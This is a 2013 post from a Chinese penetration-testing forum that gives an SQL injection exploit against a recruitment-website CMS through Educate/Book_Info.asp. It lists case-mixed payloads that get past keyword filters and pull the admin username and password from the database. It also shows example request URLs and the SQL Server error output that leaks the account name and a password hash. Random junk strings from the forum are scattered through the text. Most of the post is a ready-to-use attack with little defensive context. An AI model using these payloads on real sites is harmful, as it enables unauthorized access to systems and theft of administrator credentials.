中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
1 L1 n% ^5 g, h" r& c
0 f* U& w& i8 J: V$ o6 `
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
/ [# P6 j! k- g( q
3 f4 A, N5 J( f% S# W
exp:如下
! f$ S7 W1 J; Z( I" w) W2 z
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 M9 Y1 {& K, a: X
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! U/ S% e. u+ _; X% {1 ^ G U
+ `7 E5 I. y+ ~9 |. ?
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 J5 G2 z+ l% A5 F+ L* a
8 F- l/ G! p& B- `( o8 ^: T/ z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- e9 }3 U% A# q, d' @
+ A" ] O' D5 h' b. n1 g" ^
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
" g6 `0 L! n7 t3 i3 c& B' l$ i
% e+ A" {3 B* m
/Educate/Book_Info.asp,行 8
4 e. }$ u; ?0 T1 O7 G: }$ t
# G6 k- t% g; [$ q- I" N. K+ ^
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
V+ O, _+ g' b# y" {
5 a" ?1 M+ q$ F4 C7 m% j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
7 z: U8 r8 @! j4 `8 k$ ^$ F, Q
0 T. ]; D! A D2 Y( }
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
' A. w) F' t# M2 d6 g6 Y' `2 t1 _9 Z
1 D$ c7 g; e5 A8 R4 A$ v' U$ m
/Educate/Book_Info.asp,行 8
E! J4 N# O0 N9 `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2